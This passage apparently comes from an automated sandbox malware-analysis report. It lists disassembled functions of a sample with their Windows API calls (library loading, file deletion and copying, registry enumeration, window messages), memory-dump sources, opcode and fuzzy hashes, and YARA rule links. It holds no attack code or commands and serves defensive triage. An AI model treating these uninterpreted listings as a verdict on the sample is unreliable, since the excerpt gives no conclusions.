                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 010127B3
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 010127C6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 010127F6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4e7ed8c09a608eed05a7748a6f15885fa57e8fd0afb1c1b554c07cf447ce673c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 085c6aa242425fce0e150320ebe5c40bbb45c13f8df1f513ee61f560e643f713
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e7ed8c09a608eed05a7748a6f15885fa57e8fd0afb1c1b554c07cf447ce673c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89214375A00008BFDB14ABA4DC85CFF7BB8DF45360B144129F8A2A71E1CB3D480ADB60
                                                                                                                                                                                                                                                                                                        Function 010439B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01043A29
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 01043A30
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01043A45
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 01043A4D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                        • Opcode ID: 226d3f4060b0445810268e3a085063f1d9a84ca1c6554084bcb0ead52d912658
                                                                                                                                                                                                                                                                                                        • Instruction ID: 050a8da6510873f19e697cb682e17e70f7d8dbd19b27b5cd501b4a6a34884a77
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 226d3f4060b0445810268e3a085063f1d9a84ca1c6554084bcb0ead52d912658
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0721A1B5A40215BBEF119E68DCC4FBB77E9FB44364F106228FA919A191C371CC609760
                                                                                                                                                                                                                                                                                                        Function 00FD50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FD508E,?,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002), ref: 00FD50FD
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FD5110
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00FD508E,?,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002,00000000), ref: 00FD5133
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                        • Opcode ID: 01472beeae1e672b8a4b7bdbf7ee47b221172cde1fc8b5285dab127d77c205dc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7a61ae35505a29528ec45fb20382131ec090a089d86ea2d5900a9db7bc18de21
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01472beeae1e672b8a4b7bdbf7ee47b221172cde1fc8b5285dab127d77c205dc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76F0C874A0020CBBDB215FD4DD59BADBFB5EF14B52F0400A9F845A2250DB795D40DB90
                                                                                                                                                                                                                                                                                                        Function 0100E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0100E785
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100E797
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0100E7BD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                        • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb247b5bf35f8d6143cad0eae10efcbf5ced8ad98fc4c7839a4c3516cafd09cf
                                                                                                                                                                                                                                                                                                        • Instruction ID: fb32a86ee943d0244fd63c64a5970fe25b8754a90bf90e9b35682e108229fec4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb247b5bf35f8d6143cad0eae10efcbf5ced8ad98fc4c7839a4c3516cafd09cf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E0E5F5902511ABF7775660DD98E6D76246B24B40F040998EDC5B2091EB31C944C795
                                                                                                                                                                                                                                                                                                        Function 00FB663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB664A
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB665C
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB666E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2573b2a348ae317a05399f5b8e71c34ff0e746825d80d2599f2fd6108ac8de64
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42cac8a2577bfd7c88c43943fe30558fcc819bd4669d192d618cce77210c7843
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2573b2a348ae317a05399f5b8e71c34ff0e746825d80d2599f2fd6108ac8de64
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DE0CDBAF025226792311767BC6CBAE77699FA2F32B050119FD40D6204DF5CCC018BE8
                                                                                                                                                                                                                                                                                                        Function 00FB6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6610
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB6622
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6635
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                        • Opcode ID: 19bafc3e4d70bbe221e87e964b2e464142d8759271d15bff20a36e13b6b805e6
                                                                                                                                                                                                                                                                                                        • Instruction ID: fcff62186964b777c71b33599ef088710ce8401abe50fccedc58e301e19fb228
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19bafc3e4d70bbe221e87e964b2e464142d8759271d15bff20a36e13b6b805e6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0D012B9E12532674232266A6968ACE7B159EA1F213050065BC40EA218CF69CD01DF98
                                                                                                                                                                                                                                                                                                        Function 01023306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010235C4
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 01023646
                                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0102365C
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0102366D
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0102367F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2d4c24e360aae4bdddc628c4358922adfb6e1fa4843523dae94512ff3f1ab99b
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7ed0b60364dd73d994d049a2a1b9c04576fe71bfccea6190f0c128e61e4bce9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d4c24e360aae4bdddc628c4358922adfb6e1fa4843523dae94512ff3f1ab99b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4B14F72D00129ABDF11DBA5CC85EDEBBBDEF48314F0440A6F549EA241EA39DA44CF61
                                                                                                                                                                                                                                                                                                        Function 0103ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0103AE87
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0103AE95
                                                                                                                                                                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0103AEC8
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0103B09D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cc352422ab65f8fea05ce921c599e572ea3126855fec2b4af3f42dfb5dce4abd
                                                                                                                                                                                                                                                                                                        • Instruction ID: abd22906978df1c5efcaec56bb2188482d75a4d283da5619384f76cdda92781a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc352422ab65f8fea05ce921c599e572ea3126855fec2b4af3f42dfb5dce4abd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14A1B1B1A04301AFE720DF28C886F6AB7E5AF84714F04885DF5999B2D2DB75EC41CB91
                                                                                                                                                                                                                                                                                                        Function 0103C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C505
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103C560
                                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0103C5C3
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0103C606
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103C613
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8f4aff045c1cd958af98be299d4bd7e2b922aa63c076378ad5d5ecbc8e4d73b1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3b167a412c648661ea7ef5dedfa6d6e6c388c6c2b70e56ab22ac800313752224
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f4aff045c1cd958af98be299d4bd7e2b922aa63c076378ad5d5ecbc8e4d73b1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A61B171208241AFE314DF18C990E6ABBE9FF84348F44859DF1999B292CB35ED46CF91
                                                                                                                                                                                                                                                                                                        Function 0101ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101D7CD,?), ref: 0101E714
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101D7CD,?), ref: 0101E72D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101EAB0: GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0101ED8A
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0101EDC3
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101EF02
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101EF1A
                                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0101EF67
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ff1b012957799227c4c6b11f72eb12a481173361ccd4d8daaf385ccfcdc5db5c
                                                                                                                                                                                                                                                                                                        • Instruction ID: ca575b324eb827a2c562d6094de3add67abffd2e09d6585b1aab49374face73c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff1b012957799227c4c6b11f72eb12a481173361ccd4d8daaf385ccfcdc5db5c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA51A4B21083859BD765EBA4DC909DFB3ECEF94300F44092EE6C5C3191EF79A2888756
                                                                                                                                                                                                                                                                                                        Function 01019517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 01019534
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 010195A5
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 01019604
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 01019677
                                                                                                                                                                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 010196A2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
